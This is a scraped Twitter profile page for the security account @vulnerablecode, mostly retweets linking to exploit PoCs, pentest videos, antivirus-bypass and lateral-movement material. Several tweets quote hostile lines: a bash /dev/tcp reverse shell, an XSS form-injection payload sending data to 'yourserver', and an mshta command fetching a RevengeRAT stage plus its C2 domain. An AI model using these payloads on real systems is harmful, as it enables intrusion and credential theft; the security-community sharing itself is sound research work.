Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @vulnerablecode
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @vulnerablecode
-
Prikvačeni tweet
Also if a person is sitting on 0days for fun, can reverse or diff a patch to write an exploit and she/he is *that* person in the room that waits til the end of the ctf to submit all flags for the win - then that person can call her/himself a hacker ;)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Apple’s continuity protocol reverse enginered: https://github.com/furiousMAC/continuity?files=1 …
#shmoocon2020Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
After researching more than 30+ spy cameras,
@xi4ohuihui presents the structure and work principle of spy cameras and several effective ways to find all the hidden cameras in this#BHASIA Briefing http://ow.ly/EO7250yalnSHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
vulncode proslijedio/la je Tweet
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g
note: simple backslash URL trick
know: "4D 5A" (MZ)
Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]orgpic.twitter.com/FCzsRaI9Ve
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructurehttps://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-i/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Ever wanted to take a peek at the mimikatz sekurlsa::msv internals? New blog post is all about it plus, it also showcases PyKDumper, a tool that dumps LSASS credentials through WinDBG/PyKD.https://www.matteomalvica.com/blog/2020/01/20/mimikatz-lsass-dump-windg-pykd/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
PHP 7.0-7.4 disable_functions bypass 0day PoChttps://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Two new videos: Exploitation of GraphQL (https://pentesterlab.com/exercises/graphql/videos …) and exploitation of SVG XSS (https://pentesterlab.com/exercises/svg_xss/videos …)!!
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Red Teaming with Covenant and Donuthttps://blog.naijasecforce.com/red-teaming-with-covenant-and-donut/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
"/gitlab/*" endpoint is affected from the Jenkins Gitlab Hook Plugin Reflected XSS vulnerability. (CVE-2020-2096)pic.twitter.com/Zb6BZt82fg
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Capture NTLM Hashes using PDF (Bad-Pdf)http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.
#bugbountytip#bugbountytipshttps://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/ …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Finding and exploiting CVE-2018–7445 (unauthenticated RCE in MikroTik’s RouterOS SMB)https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Here's my PoC for CVE-2020-7980, a script to gain RCE (root level) to some Satellite controllers.https://github.com/Xh4H/Satellian-CVE-2020-7980 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
And two new videos covering Struts S2-045 exploitation (https://pentesterlab.com/exercises/s2-045/videos …) and PHPMailer RCE exploitation (https://pentesterlab.com/exercises/cve-2016-10033/videos …)!!
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Parameter tampering https://blog.securitybreached.org/2020/01/26/improper-input-validation-add-custom-text-and-urls-in-sms-send-by-snapchat-bug-bounty-poc … https://b3nac.com/posts/2019-09-02-Spear-Texting-Via-Parameter-Injection.html … https://link.medium.com/rkcIUvhuD3 https://link.medium.com/8tXuo2juD3 https://link.medium.com/a6yLwgkuD3 https://blog.avatao.com/How-I-could-steal-your-photos-from-Google … https://link.medium.com/eyxLrykuD3 https://link.medium.com/cgg3NLkuD3 https://link.medium.com/MZP6o1kuD3 https://link.medium.com/ztkAjeluD3
#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ? Obligatory disclaimer: Asking for a friend.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Windows Defender got you feeling down? Here is a simple trick to load your meterpreter payloads past Windows Defender https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/ …pic.twitter.com/dxBieW2ZQv
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
New blog (and tool): Attacking Azure, Azure AD, and Introducing PowerZurehttps://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
vulncode proslijedio/la je Tweet
Some Lateral Movement Methods: -Pass the Hash/Relay ((Net-)NTLM) -Pass the Ticket (Silver/Golden) -RDP (Legit creds) -Remote Services (VNC/SSH) -(D)COM (Remote sched tasks, Services, WMI) -Remote Service Vuln (EB) -Admin Shares (PSExec) -Webshell (Chopper) -WinRM (PS Remoting)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.